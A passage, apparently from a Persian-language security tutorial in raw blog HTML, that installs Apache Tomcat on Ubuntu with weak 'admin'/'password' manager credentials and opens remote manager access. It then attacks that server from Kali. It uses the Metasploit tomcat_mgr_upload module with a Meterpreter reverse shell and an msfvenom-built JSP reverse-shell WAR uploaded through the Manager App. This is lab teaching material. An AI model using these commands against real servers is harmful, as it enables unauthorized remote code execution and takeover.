apache-tomcat-10.1.20.tar.gz\r\n<\/pre>\n<p><img decoding=\"async\" class=\"alignnone  wp-image-19475\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/3-8-300x108.png\" alt=\"\" width=\"561\" height=\"202\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/3-8-300x108.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/3-8-1024x370.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/3-8-768x277.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/3-8-150x54.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/3-8.png 1377w\" sizes=\"(max-width: 561px) 100vw, 561px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u067e\u0648\u0634\u0647\u200c\u06cc extract \u0634\u062f\u0647 \u0631\u0627 \u0628\u0647 \u0645\u0633\u06cc\u0631 \/opt\/tomcat \u0645\u0646\u062a\u0642\u0644 \u06a9\u0631\u062f\u0647\u060c \u0645\u0627\u0644\u06a9\u06cc\u062a (ownership) \u0622\u0646 \u0631\u0627 \u0628\u0647 \u06a9\u0627\u0631\u0628\u0631 tomcat \u0648\u0627\u06af\u0630\u0627\u0631 \u06a9\u0646\u06cc\u062f \u0648 \u0645\u062c\u0648\u0632 \u0627\u062c\u0631\u0627 (execution permission) \u0631\u0627 \u0628\u0631\u0627\u06cc \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc binary \u062a\u0646\u0638\u06cc\u0645 \u0646\u0645\u0627\u06cc\u06cc\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">mv apache-tomcat-10.1.20\/* \/opt\/tomcat\r\nchown -R tomcat: \/opt\/tomcat\r\nsh -c 'chmod +x \/opt\/tomcat\/bin\/*.sh '\r\n<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19476\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/4-7-300x79.png\" alt=\"\" width=\"566\" height=\"149\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/4-7-300x79.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/4-7-768x202.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/4-7-150x39.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/4-7.png 815w\" sizes=\"(max-width: 566px) 100vw, 566px\" \/><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">[Unit]\r\nDescription=Apache Tomcat\r\nAfter=network.target\r\n\r\n[Service]\r\nType=forking\r\n\r\nUser=tomcat\r\nGroup=tomcat\r\n\r\nEnvironment=JAVA_HOME=\/usr\/lib\/jvm\/java-11-openjdk-amd64\r\nEnvironment=CATALINA_PID=\/opt\/tomcat\/tomcat.pid\r\nEnvironment=CATALINA_HOME=\/opt\/tomcat\r\nEnvironment=CATALINA_BASE=\/opt\/tomcat\r\nEnvironment=\"CATALINA_OPTS=-Xms512M -Xmx1024M -server -XX:+UseParallelGC\"\r\n\r\nExecStart=\/opt\/tomcat\/bin\/startup.sh\r\nExecStop=\/opt\/tomcat\/bin\/shutdown.sh\r\n\r\nExecReload=\/bin\/kill $MAINPID\r\nRemainAfterExit=yes\r\n\r\n[Install]\r\nWantedBy=multi-user.target<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19477\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/5-8-300x210.png\" alt=\"\" width=\"514\" height=\"360\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/5-8-300x210.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/5-8-768x537.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/5-8-150x105.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/5-8.png 891w\" sizes=\"(max-width: 514px) 100vw, 514px\" \/><\/p>\n<p>\u0628\u0631\u0627\u06cc \u0627\u0639\u0645\u0627\u0644 \u062a\u063a\u06cc\u06cc\u0631\u0627\u062a\u060c daemon \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 systemd \u0631\u0627 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 reload \u06a9\u0646\u06cc\u062f . \u0647\u0645\u0686\u0646\u06cc\u0646\u060c \u0633\u0631\u0648\u06cc\u0633 tomcat \u0631\u0627 enable \u06a9\u0646\u06cc\u062f \u062a\u0627 \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u062e\u0648\u062f\u06a9\u0627\u0631 \u0647\u0646\u06af\u0627\u0645 reboot \u0633\u06cc\u0633\u062a\u0645 \u0627\u062c\u0631\u0627 \u0634\u0648\u062f. \u0628\u0631\u0627\u06cc \u0628\u0631\u0631\u0633\u06cc \u0648\u0636\u0639\u06cc\u062a (status) \u0633\u0631\u0648\u06cc\u0633 tomcat \u0627\u0632 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u062f.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">systemctl daemon-reload\r\nsystemctl enable --now tomcat\r\nsystemctl status tomcat\r\n<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19478\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/6-7-300x148.png\" alt=\"\" width=\"545\" height=\"269\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/6-7-300x148.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/6-7-1024x505.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/6-7-768x379.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/6-7-150x74.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/6-7.png 1057w\" sizes=\"(max-width: 545px) 100vw, 545px\" \/><\/p>\n<h2><strong>\u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc<\/strong><\/h2>\n<p><span style=\"font-size: 10pt\">\u067e\u0633 \u0627\u0632 \u0627\u062a\u0645\u0627\u0645 \u0641\u0631\u0627\u06cc\u0646\u062f \u0646\u0635\u0628 \u060c \u0646\u0648\u0628\u062a \u0628\u0647 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u00a0 \u0633\u0631\u0648\u0631 Tomcat \u0645\u06cc\u200c\u0631\u0633\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0628\u0631\u0627\u06cc \u0627\u06cc\u062c\u0627\u062f \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u06a9\u0627\u0631\u0628\u0631 admin\u060c \u062a\u063a\u06cc\u06cc\u0631\u0627\u062a \u0645\u0648\u0631\u062f \u0646\u06cc\u0627\u0632 \u0631\u0627 \u062f\u0631 \u0641\u0627\u06cc\u0644 \u0632\u06cc\u0631 \u0627\u0639\u0645\u0627\u0644 \u06a9\u0646\u06cc\u062f:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">nano \/opt\/tomcat\/conf\/tomcat-users.xml<\/pre>\n<p><span style=\"font-size: 10pt\">\u0642\u0637\u0639\u0647 \u06a9\u062f \u0632\u06cc\u0631 \u0631\u0627 \u0642\u0628\u0644 \u0627\u0632 \u062a\u06af &lt;\/tomcat-users&gt; \u062f\u0631 \u0641\u0627\u06cc\u0644:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">&lt;role rolename=\"admin-gui\"\/&gt;\r\n&lt;role rolename=\"manager-gui\"\/&gt;\r\n&lt;user username=\"admin\" password=\"password\" roles=\"admin-gui,manager-gui\"\/&gt;\r\n<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19479\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/7-6-298x300.png\" alt=\"\" width=\"560\" height=\"564\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/7-6-298x300.png 298w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/7-6-150x151.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/7-6-768x773.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/7-6-96x96.png 96w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/7-6.png 982w\" sizes=\"(max-width: 560px) 100vw, 560px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u0628\u0631\u0627\u06cc \u0641\u0639\u0627\u0644\u200c\u06a9\u0631\u062f\u0646 \u062f\u0633\u062a\u0631\u0633\u06cc \u0627\u0632 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0628\u0647 \u0628\u062e\u0634 Tomcat Manager\u060c \u062a\u063a\u06cc\u06cc\u0631\u0627\u062a \u0631\u0627 \u062f\u0631 \u0641\u0627\u06cc\u0644 context.xml \u06a9\u0647 \u062f\u0631 \u062f\u0627\u06cc\u0631\u06a9\u062a\u0648\u0631\u06cc \u0647\u0627\u06cc \u0632\u06cc\u0631 \u0642\u0631\u0627\u0631 \u062f\u0627\u0631\u062f\u060c \u0627\u0639\u0645\u0627\u0644 \u06a9\u0646\u06cc\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">nano \/opt\/tomcat\/webapps\/manager\/META-INF\/context.xml\r\nnano \/opt\/tomcat\/webapps\/host-manager\/META-INF\/context.xml\r\n<\/pre>\n<p><span style=\"font-size: 10pt\">\u0628\u0631\u0627\u06cc \u0641\u0639\u0627\u0644\u200c\u0633\u0627\u0632\u06cc \u06a9\u0627\u0645\u0644 \u062f\u0633\u062a\u0631\u0633\u06cc \u0631\u0627\u0647 \u062f\u0648\u0631 (remote access) \u0628\u0647 Tomcat Manager\u060c \u062e\u0637 \u0632\u06cc\u0631 \u0631\u0627 \u0627\u0632 \u0647\u0631 \u062f\u0648 \u0641\u0627\u06cc\u0644 \u062d\u0630\u0641 \u06a9\u0646\u06cc\u062f.<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19480\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/8-4-300x18.png\" alt=\"\" width=\"534\" height=\"32\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/8-4-300x18.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/8-4-768x45.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/8-4-150x9.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/8-4.png 905w\" sizes=\"(max-width: 534px) 100vw, 534px\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19481\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/9-6-300x173.png\" alt=\"\" width=\"524\" height=\"302\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/9-6-300x173.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/9-6-1024x592.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/9-6-768x444.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/9-6-150x87.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/9-6.png 1059w\" sizes=\"(max-width: 524px) 100vw, 524px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u067e\u0633 \u0627\u0632 \u0627\u062a\u0645\u0627\u0645 \u062a\u063a\u06cc\u06cc\u0631\u0627\u062a\u060c \u0628\u0631\u0627\u06cc \u0627\u0639\u0645\u0627\u0644 \u062a\u0646\u0638\u06cc\u0645\u0627\u062a \u062c\u062f\u06cc\u062f\u060c \u0633\u0631\u0648\u06cc\u0633 tomcat \u0631\u0627 \u062f\u0631 Ubuntu \u0628\u0627 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0631\u0627\u0647\u200c\u0627\u0646\u062f\u0627\u0632\u06cc \u0645\u062c\u062f\u062f \u06a9\u0646\u06cc\u062f:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">systemctl restart tomcat<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19482\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/10-6-300x27.png\" alt=\"\" width=\"522\" height=\"47\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/10-6-300x27.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/10-6-150x14.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/10-6.png 616w\" sizes=\"(max-width: 522px) 100vw, 522px\" \/><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">sudo netstat -tulnp | grep 8080\r\nsudo ss -tulwn | grep 8080<\/pre>\n<p><span style=\"font-size: 10pt\">\u0647\u0645\u0686\u0646\u06cc\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u062f \u062f\u0631 \u0645\u0631\u0648\u0631\u06af\u0631 \u062e\u0648\u062f \u0622\u062f\u0631\u0633 \u0632\u06cc\u0631 \u0631\u0627 \u0648\u0627\u0631\u062f \u06a9\u0646\u06cc\u062f:<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19483\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/11-5-300x213.png\" alt=\"\" width=\"531\" height=\"377\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/11-5-300x213.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/11-5-1024x727.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/11-5-768x545.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/11-5-150x106.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/11-5.png 1447w\" sizes=\"(max-width: 531px) 100vw, 531px\" \/><\/p>\n<h2><strong>\u0634\u0646\u0627\u0633\u0627\u06cc\u06cc<\/strong><\/h2>\n<p><span style=\"font-size: 10pt\">\u067e\u0633 \u0627\u0632 \u0627\u062a\u0645\u0627\u0645 \u0646\u0635\u0628 \u00a0\u0648 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u060c \u0627\u06a9\u0646\u0648\u0646 \u0648\u0627\u0631\u062f \u0645\u0631\u062d\u0644\u0647\u200c\u06cc \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc (enumeration) \u0645\u06cc\u200c\u0634\u0648\u06cc\u0645.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u06cc\u0646 \u0633\u0646\u0627\u0631\u06cc\u0648\u060c \u0627\u0632 Kali Linux \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 \u0645\u0627\u0634\u06cc\u0646 \u062d\u0645\u0644\u0647\u200c\u06a9\u0646\u0646\u062f\u0647 \u00a0\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645.<\/span><br \/>\n<span style=\"font-size: 10pt\">\u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0627\u0648\u0644\u06cc\u0647 \u0631\u0627 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0628\u0627 \u0627\u0628\u0632\u0627\u0631 nmap \u0627\u0646\u062c\u0627\u0645 \u062f\u0627\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">nmap -p 8080 -sV 192.168.1.5<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19484\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/12-3-300x86.png\" alt=\"\" width=\"488\" height=\"140\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/12-3-300x86.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/12-3-768x221.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/12-3-150x43.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/12-3.png 919w\" sizes=\"(max-width: 488px) 100vw, 488px\" \/><\/p>\n<h2><strong>\u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc<\/strong> <strong>\u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632<\/strong><strong> Metasploit Framework<\/strong><\/h2>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647 \u0627\u0628\u062a\u062f\u0627 \u062a\u0644\u0627\u0634 \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645 \u0627\u0632 \u0642\u0627\u0628\u0644\u06cc\u062a \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u00a0\u0645\u0648\u062c\u0648\u062f \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u06a9\u0646\u06cc\u0645\u060c \u0686\u0631\u0627 \u06a9\u0647 \u0628\u0631\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc upload \u0641\u0627\u06cc\u0644 \u062f\u0631 Tomcat\u060c \u0627\u0632 \u0642\u0628\u0644 \u06cc\u06a9 exploit \u0622\u0645\u0627\u062f\u0647 \u062f\u0631 Metasploit \u0648\u062c\u0648\u062f \u062f\u0627\u0631\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u067e\u0633 \u0627\u0632 \u0648\u0631\u0648\u062f \u0628\u0647 \u0645\u062d\u06cc\u0637 Metasploit\u060c \u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0632\u06cc\u0631 \u0631\u0627 \u0648\u0627\u0631\u062f \u06a9\u0646\u06cc\u062f \u062a\u0627 \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a \u0627\u062c\u0631\u0627 \u0634\u0648\u062f:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">use exploit\/multi\/http\/tomcat_mgr_upload\r\nset RHOSTS &lt;target-ip&gt;\r\nset RPORT 8080\r\nset HTTPUSERNAME &lt;admin-username&gt;\r\nset HTTPPASSWORD &lt;admin-password&gt;\r\nset TARGETURI \/manager\r\nset PAYLOAD java\/meterpreter\/reverse_tcp\r\nset LHOST &lt;attacker-ip&gt;\r\nset LPORT &lt;attacker-port&gt;\r\nrun\r\n<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19485\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/13-2-300x289.png\" alt=\"\" width=\"527\" height=\"508\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/13-2-300x289.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/13-2-1024x985.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/13-2-768x739.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/13-2-150x144.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/13-2.png 1244w\" sizes=\"(max-width: 527px) 100vw, 527px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u0647\u0645\u0627\u0646\u200c\u0637\u0648\u0631 \u06a9\u0647 \u062f\u0631 \u0628\u0627\u0644\u0627 \u0645\u0634\u0627\u0647\u062f\u0647 \u0634\u062f\u060c \u067e\u0633 \u0627\u0632 \u0627\u062c\u0631\u0627\u06cc \u0645\u0648\u0641\u0642 \u0627\u06a9\u0633\u067e\u0644\u0648\u06cc\u062a\u060c \u06cc\u06a9 reverse shell \u0628\u0647 \u062f\u0633\u062a \u0645\u06cc\u200c\u0622\u06cc\u062f \u0648 \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0631\u0627 \u0627\u0632 \u0637\u0631\u06cc\u0642 meterpreter shell \u0627\u062c\u0631\u0627 \u06a9\u0646\u062f.<\/span><\/p>\n<h2><strong>\u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u062f\u0633\u062a\u06cc<\/strong> <strong>\u2014 <\/strong><strong>\u062f\u0631\u06cc\u0627\u0641\u062a<\/strong><strong> Reverse Shell<\/strong><\/h2>\n<p><span style=\"font-size: 10pt\">\u0639\u0644\u0627\u0648\u0647 \u0628\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 Metasploit\u060c \u0645\u0647\u0627\u062c\u0645\u0627\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0647\u0645\u06cc\u0646 \u0641\u0631\u0627\u06cc\u0646\u062f \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0631\u0627 \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u062f\u0633\u062a\u06cc \u0646\u06cc\u0632 \u0627\u0646\u062c\u0627\u0645 \u062f\u0647\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0628\u0631\u0627\u06cc \u0627\u06cc\u0646 \u06a9\u0627\u0631\u060c \u0627\u0648\u0644\u06cc\u0646 \u0642\u062f\u0645\u060c \u0633\u0627\u062e\u062a \u06cc\u06a9 \u0641\u0627\u06cc\u0644 .war (\u0641\u0627\u06cc\u0644 Web Application Archive \u0645\u062e\u0635\u0648\u0635 \u0633\u0631\u0648\u06cc\u0633\u200c\u0647\u0627\u06cc Java) \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u0628\u0632\u0627\u0631 msfvenom \u0627\u0633\u062a.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\">msfvenom -p java\/jsp_shell_reverse_tcp lhost=192.168.1.7 lport=1234 -f war &gt; shell.war<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19486\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/14-2-300x35.png\" alt=\"\" width=\"523\" height=\"61\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/14-2-300x35.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/14-2-1024x120.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/14-2-768x90.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/14-2-150x18.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/14-2.png 1284w\" sizes=\"(max-width: 523px) 100vw, 523px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u067e\u0633 \u0627\u0632 \u0633\u0627\u062e\u062a \u0641\u0627\u06cc\u0644 shell.war\u060c \u0645\u0647\u0627\u062c\u0645 \u0628\u0627\u06cc\u062f \u0622\u0646 \u0631\u0627 \u062f\u0631 \u0627\u067e\u0644\u06cc\u06a9\u06cc\u0634\u0646 \u0645\u062f\u06cc\u0631\u06cc\u062a\u06cc Tomcat Manager App \u0622\u067e\u0644\u0648\u062f \u06a9\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0628\u0631\u0627\u06cc \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u0628\u062e\u0634 Manager App\u060c \u06a9\u0627\u0631\u0628\u0631 \u0628\u0627\u06cc\u062f Basic Authentication \u0627\u0631\u0627\u0626\u0647 \u062f\u0647\u062f.<\/span><br \/>\n<span style=\"font-size: 10pt\">\u0645\u0639\u0645\u0648\u0644\u0627\u064b \u0646\u0627\u0645 \u06a9\u0627\u0631\u0628\u0631\u06cc \u0648 \u0631\u0645\u0632 \u0639\u0628\u0648\u0631 \u00a0\u067e\u06cc\u0634\u200c\u0641\u0631\u0636 \u0628\u0647 \u0635\u0648\u0631\u062a \u0632\u06cc\u0631 \u0627\u0633\u062a:<\/span><\/p>\n<ul>\n<li><span style=\"font-size: 10pt\">username: admin<\/span><\/li>\n<li><span style=\"font-size: 10pt\">password: password<\/span><\/li>\n<\/ul>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u0627\u0639\u062a\u0628\u0627\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627 \u0628\u0631\u0627\u06cc \u0648\u0631\u0648\u062f \u0628\u0647 Tomcat Manager App \u0648 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0631\u0627\u0628\u0637 \u06a9\u0627\u0631\u0628\u0631\u06cc \u0622\u0646 \u062c\u0647\u062a \u0622\u067e\u0644\u0648\u062f \u0641\u0627\u06cc\u0644\u200c\u0647\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19487\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/15-2-300x231.png\" alt=\"\" width=\"571\" height=\"440\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/15-2-300x231.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/15-2-1024x790.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/15-2-768x592.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/15-2-390x300.png 390w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/15-2-150x116.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/15-2.png 1282w\" sizes=\"(max-width: 571px) 100vw, 571px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u067e\u0633 \u0627\u0632 \u0648\u0631\u0648\u062f \u0628\u0647 \u0633\u06cc\u0633\u062a\u0645 \u060c \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u0641\u0627\u06cc\u0644 shell.war \u06a9\u0647 \u0627\u0632 \u0642\u0628\u0644 \u0627\u06cc\u062c\u0627\u062f \u0634\u062f\u0647 \u0627\u0633\u062a \u0631\u0627 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0642\u0627\u0628\u0644\u06cc\u062a WAR file deployment \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u06a9\u0646\u062f.<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19488\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/16-2-300x179.png\" alt=\"\" width=\"535\" height=\"319\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/16-2-300x179.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/16-2-1024x611.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/16-2-768x458.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/16-2-150x89.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/16-2.png 1252w\" sizes=\"(max-width: 535px) 100vw, 535px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u067e\u0633 \u0627\u0632 \u0627\u0646\u062c\u0627\u0645 upload\u060c \u0641\u0627\u06cc\u0644 \u062f\u0631 \u0628\u062e\u0634 Uploaded WAR files \u0642\u0627\u0628\u0644 \u0645\u0634\u0627\u0647\u062f\u0647 \u062e\u0648\u0627\u0647\u062f \u0628\u0648\u062f.<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone  wp-image-19489\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/17-2-300x133.png\" alt=\"\" width=\"537\" height=\"238\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/17-2-300x133.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/17-2-768x341.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/17-2-150x67.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/05\/17-2.png 1006w\" sizes=\"(max-width: 537px) 100vw, 537px\" \/><\/p>\n<p><span style=\"font-size: 10pt\">\u067e\u06cc\u0634 \u0627\u0632 